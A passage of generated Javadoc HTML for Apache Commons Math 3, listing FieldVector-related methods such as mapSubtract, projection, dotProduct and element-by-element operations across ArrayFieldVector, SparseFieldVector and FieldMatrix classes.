multiplication operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapMultiplyToSelf(T)">mapMultiplyToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a multiplication operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapMultiplyToSelf(T)">mapMultiplyToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Map a multiplication operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapSubtract(T)">mapSubtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a subtraction operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapSubtract(T)">mapSubtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a subtraction operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapSubtract(T)">mapSubtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Map a subtraction operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapSubtractToSelf(T)">mapSubtractToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a subtraction operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapSubtractToSelf(T)">mapSubtractToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a subtraction operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapSubtractToSelf(T)">mapSubtractToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Map a subtraction operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html#operate(org.apache.commons.math3.linear.FieldVector)">operate</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;&nbsp;v)</code> <div class="block">Returns the result of multiplying this by the vector <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">AbstractFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html#operate(org.apache.commons.math3.linear.FieldVector)">operate</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;&nbsp;v)</code> <div class="block">Returns the result of multiplying this by the vector <code>v</code>.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html#preMultiply(org.apache.commons.math3.linear.FieldVector)">preMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;&nbsp;v)</code> <div class="block">Returns the (row) vector result of premultiplying this by the vector <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">AbstractFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html#preMultiply(org.apache.commons.math3.linear.FieldVector)">preMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;&nbsp;v)</code> <div class="block">Returns the (row) vector result of premultiplying this by the vector <code>v</code>.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#projection(org.apache.commons.math3.linear.FieldVector)">projection</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Find the orthogonal projection of this vector onto another vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#projection(org.apache.commons.math3.linear.FieldVector)">projection</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Find the orthogonal projection of this vector onto another vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#projection(org.apache.commons.math3.linear.FieldVector)">projection</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Find the orthogonal projection of this vector onto another vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldDecompositionSolver.html" title="type parameter in FieldDecompositionSolver">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldDecompositionSolver.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldDecompositionSolver.html#solve(org.apache.commons.math3.linear.FieldVector)">solve</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldDecompositionSolver.html" title="type parameter in FieldDecompositionSolver">T</a>&gt;&nbsp;b)</code> <div class="block">Solve the linear equation A &times; X = B for matrices A.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#subtract(org.apache.commons.math3.linear.FieldVector)">subtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute <code>this</code> minus <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#subtract(org.apache.commons.math3.linear.FieldVector)">subtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute <code>this</code> minus <code>v</code>.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#subtract(org.apache.commons.math3.linear.FieldVector)">subtract</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute <code>this</code> minus <code>v</code>.</div> </td> </tr> </tbody> </table> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation"> <caption><span>Methods in <a href="../../../../../../org/apache/commons/math3/linear/package-summary.html">org.apache.commons.math3.linear</a> with parameters of type <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#add(org.apache.commons.math3.linear.FieldVector)">add</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the sum of <code>this</code> and <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#add(org.apache.commons.math3.linear.FieldVector)">add</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the sum of <code>this</code> and <code>v</code>.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#add(org.apache.commons.math3.linear.FieldVector)">add</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the sum of <code>this</code> and <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#append(org.apache.commons.math3.linear.FieldVector)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Construct a vector by appending a vector to this vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#append(org.apache.commons.math3.linear.FieldVector)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Construct a vector by appending a vector to this vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#append(org.apache.commons.math3.linear.FieldVector)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Construct a vector by appending a vector to this vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>protected void</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#checkVectorDimensions(org.apache.commons.math3.linear.FieldVector)">checkVectorDimensions</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Check if instance and specified vectors have the same dimension.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a></code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#dotProduct(org.apache.commons.math3.linear.FieldVector)">dotProduct</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the dot product.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a></code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#dotProduct(org.apache.commons.math3.linear.FieldVector)">dotProduct</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the dot product.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a></code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#dotProduct(org.apache.commons.math3.linear.FieldVector)">dotProduct</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Compute the dot product.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ebeDivide(org.apache.commons.math3.linear.FieldVector)">ebeDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element division.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#ebeDivide(org.apache.commons.math3.linear.FieldVector)">ebeDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element division.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#ebeDivide(org.apache.commons.math3.linear.FieldVector)">ebeDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element division.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ebeMultiply(org.apache.commons.math3.linear.FieldVector)">ebeMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element multiplication.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#ebeMultiply(org.apache.commons.math3.linear.FieldVector)">ebeMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element multiplication.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#ebeMultiply(org.apache.commons.math3.linear.FieldVector)">ebeMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element multiplication.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html#operate(org.apache.commons.math3.linear.FieldVector)">operate</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;&nbsp;v)</code> <div class="block">Returns the result of multiplying this by the vector <code>v</code>.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">AbstractFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html#operate(org.apache.commons.math3.linear.FieldVector)">operate</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;&nbsp;v)</code> <div class="block">Returns the result of multiplying this by the vector <code>v</code>.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="interface in org.apache.commons.math3.linear">FieldMatrix</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#outerProduct(org.apache.commons.math3.linear.FieldVector)">outerProduct</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in 